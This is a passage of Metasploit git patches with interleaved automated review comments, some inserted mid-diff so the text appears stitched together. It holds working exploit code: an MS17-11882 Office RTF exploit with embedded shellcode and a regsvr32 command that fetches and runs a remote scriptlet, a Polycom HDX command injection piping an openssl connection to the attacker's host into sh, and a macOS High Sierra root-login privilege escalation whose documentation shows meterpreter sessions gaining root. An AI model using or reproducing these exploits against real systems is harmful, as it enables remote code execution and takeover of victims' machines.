'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 
'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce' - header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000' - header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000' - header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000003' - header << 
'0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' - header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' - header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000' - header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n" + header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000' + header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff' + header << '09000600000000000000000000000100000001000000000000000010000002000' + header << 
'00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040' + header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0' + header << '07400720079000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000016000500ffffffffffffffff02000' + header << '00002ce020000000000c0000000000000460000000000000000000000008020ce' + header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '000000000000001400000000000000010043006f006d0070004f0062006a00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0000000000000000000000000000120002010100000003000000ffffffff00000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000' + header << '00000000000000000000000000000000000000000000000000000000000000003' + header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060' + header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff' + header << 'ffffff01000002080000000000000000000000000000000000000000000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000' + header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045' + header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000' + header << '00000000000000000000000000000000000000000000000000000000000000000' + header << "00000300040000000000000000000000000000000000000000000000000000000" + header << "000000000000000000000000000000000000000000000000000000000000000\n" + + + shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00" + shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" + shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09" + shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53" + shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90" footer = 
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000' - footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400' - footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' - footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' - footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C' - footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002' + footer << '4500710075006100740069006F006E0020004E006100740069007600650000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000400' + footer << '0000C5000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00' + footer << 
'000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000000000' + footer << '000000000000000000000000000000000000000000000000000000' + footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF' + footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000' + footer << '00000000000000000000000000000000000000000000000000000000000000000' + footer << '00000000000000001050000050000000D0000004D45544146494C' + footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C' + footer << '500000002001C0000000000050000000902000000000500000002' footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF' footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090' footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016' @@ -123,9 +178,6 @@ class MetasploitModule < Msf::Exploit::Remote footer << "}}}\n" footer << '\par}' + "\n" - shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ" - shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10" - shellcode << "\x90\x90" payload = shellcode payload += [0x00402114].pack("V") 
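Review bot: The re-wrapped `header <<` lines in the `@@ -55,54 +57,107 @@` hunk are 65 hex digits wide, an odd count, so one byte's two nibbles straddle adjacent lines (the first line ends `...0000000` and the next begins `c0000d0cf...`), which makes it impossible to check the blob byte by byte against a reference dump; wrapping at an even width such as 64 leaves the concatenated string identical while keeping every line byte-aligned. The `footer <<` lines are wrapped at several different widths (65, 53, 54, 64) and the last three keep the original 118-character lines, which reads as unfinished. Because only line breaks were meant to move, verifying that the concatenated header and footer hex is unchanged from the previous revision should be part of accepting this commit. The enclosing method — presumably `generate_rtf`, given the `primer` hunk further down — starts above this hunk.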
@@ -133,13 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll" payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first payload = header + payload + footer - - path = ::File.join(Msf::Config.local_directory, datastore['FILENAME']) - ::File.open(path, 'wb') do |fd| - fd.write(payload) - fd.close - end - print_good("Wrote payload to #{path}") + payload end @@ -207,6 +253,6 @@ class MetasploitModule < Msf::Exploit::Remote def primer - generate_rtf + file_create(generate_rtf) end end From 2544b4d8db4b4cad4af2d312bb32a8cde13fff88 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 21:39:04 -0500 Subject: [PATCH 214/254] Change target name --- modules/exploits/windows/fileformat/office_ms17_11882.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb index 47d486f734..37f096f7ac 100644 --- a/modules/exploits/windows/fileformat/office_ms17_11882.rb +++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb @@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ - ['Automatic', {} ], + ['Microsoft Office Word', {} ], ], 'DefaultTarget' => 0, 'Payload' => { From 676a08b84999251806d6310521875db16e487de4 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Tue, 28 Nov 2017 22:01:41 -0500 Subject: [PATCH 215/254] Update polycom_hdx_traceroute_exec.rb --- modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb index fdd6474c2c..033d433d37 100644 --- a/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb 
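Review bot: The padding `payload = (payload + ("\x00" * (197 - payload.length)))` in the `@@ -133` hunk raises an `ArgumentError: negative argument` as soon as the `regsvr32 ... /i:#{get_uri}.sct` string grows past 197 bytes, and `get_uri` varies with LHOST, LPORT and URIPATH, so a long callback URL fails with an unrelated-looking error; a guard such as `fail_with(Failure::BadConfig, 'regsvr32 command exceeds 197 bytes, shorten URIPATH') if payload.length > 197` before the padding reports the real cause. Returning `payload` and moving the write into `primer` via `file_create` is fine, but the method no longer says what it yields; a one-line comment above the bare `payload` noting that it is the complete RTF document text (header, hex-encoded object data, footer) would help the next reader. The enclosing `generate_rtf` starts before this hunk.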
+++ b/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb
@@ -105,7 +105,6 @@ class MetasploitModule < Msf::Exploit::Remote
 # Figure out the port we picked
 cbport = self.service.getsockname[2]
- # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
 cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
 sock.put(cmd)
 if datastore['VERBOSE']
From 3fff092042c07b23e16ff5fc8c39741f4cac3157 Mon Sep 17 00:00:00 2001
From: Adam Cammack
Date: Tue, 28 Nov 2017 21:37:25 -0600
Subject: [PATCH 216/254] Fix include scope in external module mixin
The auxiliary report mixin overrides some of the methods in Metasploit::Credential, which is fine in framework, but causes issues in projects relying on the base behavior of Metasploit::Credential. This changes the include scope from global to just whatever includes the external module mixin.
---
 lib/msf/core/module/external.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/lib/msf/core/module/external.rb b/lib/msf/core/module/external.rb
index 4c08d5a4e2..d90c9cbfed 100644
--- a/lib/msf/core/module/external.rb
+++ b/lib/msf/core/module/external.rb
@@ -1,6 +1,6 @@
-include Msf::Auxiliary::Report
-
 module Msf::Module::External
+ include Msf::Auxiliary::Report
+
 def wait_status(mod)
 begin
 while mod.running
From 7f1f7281f128ec06b32415aa7d4c801ba0cb5892 Mon Sep 17 00:00:00 2001
From: Tim W
Date: Wed, 29 Nov 2017 16:06:02 +0800
Subject: [PATCH 217/254] add local exploit for osx root login with no password
---
 .../exploits/osx/local/root_no_password.rb | 55 +++++++++++++++++++
 1 file changed, 55 insertions(+)
 create mode 100644 modules/exploits/osx/local/root_no_password.rb
diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb
new file mode 100644
index 0000000000..2a0031c258
--- /dev/null
+++ b/modules/exploits/osx/local/root_no_password.rb
@@ -0,0 +1,55 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Wed 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end From 58897bf2fc3c1433c2bcd610955cda7611ac5755 Mon Sep 17 00:00:00 2001 From: Tim W Date: Wed, 29 Nov 2017 16:36:50 +0800 Subject: [PATCH 218/254] msftidy --- modules/exploits/osx/local/root_no_password.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
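Review bot: In `exploit`, the result of `cmd_exec("chmod +x #{payload_file}")` is bound to `output` and never read; either drop the binding, `cmd_exec("chmod +x #{payload_file}")`, or inspect it before proceeding so a failed chmod is reported instead of silently executing a non-executable file. The same method calls `Rex::Text::rand_text_alpha_lower(12)` with `::` for a method call, where the rest of the framework writes `Rex::Text.rand_text_alpha_lower(12)`. `exploit_cmd` interpolates `root_payload` unquoted into an osascript string; a one-line comment stating that the argument is expected to be the shell-safe random path built in `exploit` would make that precondition explicit for future callers.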
diff --git a/modules/exploits/osx/local/root_no_password.rb b/modules/exploits/osx/local/root_no_password.rb index 2a0031c258..2fc91f8fe7 100644 --- a/modules/exploits/osx/local/root_no_password.rb +++ b/modules/exploits/osx/local/root_no_password.rb @@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Wed 29 2017' + 'DisclosureDate' => 'Nov 29 2017' )) end From efa8d566d7430183975922bebcca6f0bb2323e2f Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 29 Nov 2017 10:26:06 -0600 Subject: [PATCH 219/254] Added documentation for iamroot --- .../exploit/osx/local/root_no_password.md | 104 ++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 documentation/modules/exploit/osx/local/root_no_password.md diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md new file mode 100644 index 0000000000..31162807ca --- /dev/null +++ b/documentation/modules/exploit/osx/local/root_no_password.md 
@@ -0,0 +1,104 @@ +## Vulnerable Application +This vulnerability works against OSX 10.13 (High Sierra). Early +research (https://objective-see.com/blog/blog_0x24.html) suggests that +the vulnerability is the result of multiple errors ultimately started by +an incorrect return value from triggered by the funtion +`od_verify_crypt_password` rteturning true even if the account is +disabled. The subsequent function calls appear to alidate and create +the password, though there is still a lot of research into the bug and +these results should be verified once more research has been published. + +## Verification Steps +1. Get a session on a vulnerable system +2. `use exploit/osx/local/root_no_password` +3. `set lhost ` +4. `set lport ` +5. `set session ` +6. `run` + +## Scenarios +### Example Run +``` +msf exploit(psexec) > use exploit/multi/handler +msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +msf exploit(handler) > set lhost +lhost => +msf exploit(handler) > set lport 4567 +lport => 4567 +msf exploit(handler) > run + +[*] Started reverse TCP handler on :4567 +httpserver[*] Meterpreter session 1 opened (:4567 -> :49347) at 2017-11-29 07:28:32 -0600 + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=501, gid=20, euid=501, egid=20 +meterpreter > background +[*] Backgrounding session 1... +msf exploit(handler) > use exploit/osx/local/root_no_password +msf exploit(root_no_password) > show options + +Module options (exploit/osx/local/root_no_password): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. 
+ + +Payload options (osx/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) + + +msf exploit(root_no_password) > set lhost +lhost => +msf exploit(root_no_password) > set lport 4562 +lport => 4562 +msf exploit(root_no_password) > set session 1 +session => 1 +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/cinbvsmrmyxw' +[*] Meterpreter session 2 opened (:4562 -> :62522) at 2017-11-29 07:29:56 -0600 +[*] - Meterpreter session 2 closed. Reason: Died + + +[*] Executing payload file as '/tmp/cinbvsmrmyxw' +[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target + +[-] Invalid session identifier: 2 +msf exploit(root_no_password) > +msf exploit(root_no_password) > +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/imtjkakowanv' +[*] Executing payload file as '/tmp/imtjkakowanv' +[*] Meterpreter session 3 opened (:4562 -> :49348) at 2017-11-29 07:30:53 -0600 +[+] Deleted /tmp/imtjkakowanv + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=0, gid=20, euid=0, egid=20 +meterpreter > +``` From 9dc3d60fc286597f282857f9be747b821a6632ec Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Wed, 29 Nov 2017 10:29:38 -0600 Subject: [PATCH 220/254] Stupid Typos --- documentation/modules/exploit/osx/local/root_no_password.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md index 31162807ca..ac793fa6fa 100644 
--- a/documentation/modules/exploit/osx/local/root_no_password.md
+++ b/documentation/modules/exploit/osx/local/root_no_password.md
@@ -2,9 +2,9 @@ This vulnerability works against OSX 10.13 (High Sierra). Early research (https://objective-see.com/blog/blog_0x24.html) suggests that the vulnerability is the result of multiple errors ultimately started by -an incorrect return value from triggered by the funtion -`od_verify_crypt_password` rteturning true even if the account is -disabled. The subsequent function calls appear to alidate and create +an incorrect return value from triggered by the function +`od_verify_crypt_password` returning true even if the account is +disabled. The subsequent function calls appear to validate and create the password, though there is still a lot of research into the bug and these results should be verified once more research has been published.
From 8051f790d0cbf8bd7310fabce692a3d686d0c9a7 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 14 Nov 2017 20:13:35 -0600
Subject: [PATCH 221/254] if there is info in the uuid_db, put it in payload_uuid automatically
---
 lib/msf/core/handler.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 70b60081e0..902e674aad 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -222,7 +222,13 @@ protected
 s.set_from_exploit(assoc_exploit)
 # Pass along any associated payload uuid if specified
- s.payload_uuid = opts[:payload_uuid] if opts[:payload_uuid]
+ if opts[:payload_uuid]
+ s.payload_uuid = opts[:payload_uuid]
+ if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+ s.payload_uuid.name = uuid_info['name']
+ s.payload_uuid.timestamp = uuid_info['timestamp']
+ end
+ end
 # If the session is valid, register it with the framework and
 # notify any waiters we may have.
From 59446f3d961ef29ac358ac5d873785185f0156ad Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 14 Nov 2017 20:15:51 -0600
Subject: [PATCH 222/254] change ui to use new settings
---
 lib/msf/base/serializer/readable_text.rb | 6 +++---
 lib/msf/core/handler.rb | 3 +++
 2 files changed, 6 insertions(+), 3 deletions(-)
diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 1c170f8ce6..00b39824a9 100644
--- a/lib/msf/base/serializer/readable_text.rb
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -652,10 +652,10 @@ class ReadableText
 sess_checkin = "#{(Time.now.to_i - session.last_checkin.to_i)}s ago @ #{session.last_checkin.to_s}"
 end
- if session.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+ if session.payload_uuid.registered
 sess_registration = "Yes"
- if uuid_info['name']
- sess_registration << " - Name=\"#{uuid_info['name']}\""
+ if session.payload_uuid.name
+ sess_registration << " - Name=\"#{session.payload_uuid.name}\""
 end
 end
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 902e674aad..6f4e0a6888 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -225,8 +225,11 @@ protected
 if opts[:payload_uuid]
 s.payload_uuid = opts[:payload_uuid]
 if s.payload_uuid.respond_to?(:puid_hex) && (uuid_info = framework.uuid_db[sess_puid])
+ s.payload_uuid.registered = true
 s.payload_uuid.name = uuid_info['name']
 s.payload_uuid.timestamp = uuid_info['timestamp']
+ else
+ s.payload_uuid.registered = false
 end
 end
From 446f3fa675eb0e0fb7f23ab1e5b49dba4fa8651d Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 14 Nov 2017 20:21:38 -0600
Subject: [PATCH 223/254] more conversions
---
 lib/msf/base/serializer/readable_text.rb | 1 -
 lib/msf/core/handler.rb | 2 +-
 2 files changed, 1 insertion(+), 2 deletions(-)
diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb
index 00b39824a9..27fc80f110 100644
--- a/lib/msf/base/serializer/readable_text.rb
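Review bot: The `else` branch added in the handler.rb hunk runs exactly when `s.payload_uuid.respond_to?(:puid_hex)` is false, i.e. when `payload_uuid` is not necessarily a `Msf::Payload::UUID`, so `s.payload_uuid.registered = false` can raise `NoMethodError` on a value the old one-line form tolerated; guard it with `respond_to?(:registered=)` or drop the branch and rely on a default on the UUID class instead. The readable_text.rb hunk has the same exposure: `if session.payload_uuid.registered` replaces a `respond_to?(:puid_hex)` guard with an unguarded call, so `if session.payload_uuid.respond_to?(:registered) && session.payload_uuid.registered` keeps the previous tolerance for plain-string uuids. Both enclosing methods start and end outside their hunks.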
+++ b/lib/msf/base/serializer/readable_text.rb
@@ -634,7 +634,6 @@ class ReadableText
 sess_via = session.via_exploit.to_s
 sess_type = session.type.to_s
 sess_uuid = session.payload_uuid.to_s
- sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
 sess_luri = session.exploit_datastore['LURI'] || "" if session.exploit_datastore
 sess_enc = false
 if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb
index 6f4e0a6888..96f3fe56b4 100644
--- a/lib/msf/core/handler.rb
+++ b/lib/msf/core/handler.rb
@@ -224,7 +224,7 @@ protected
 # Pass along any associated payload uuid if specified
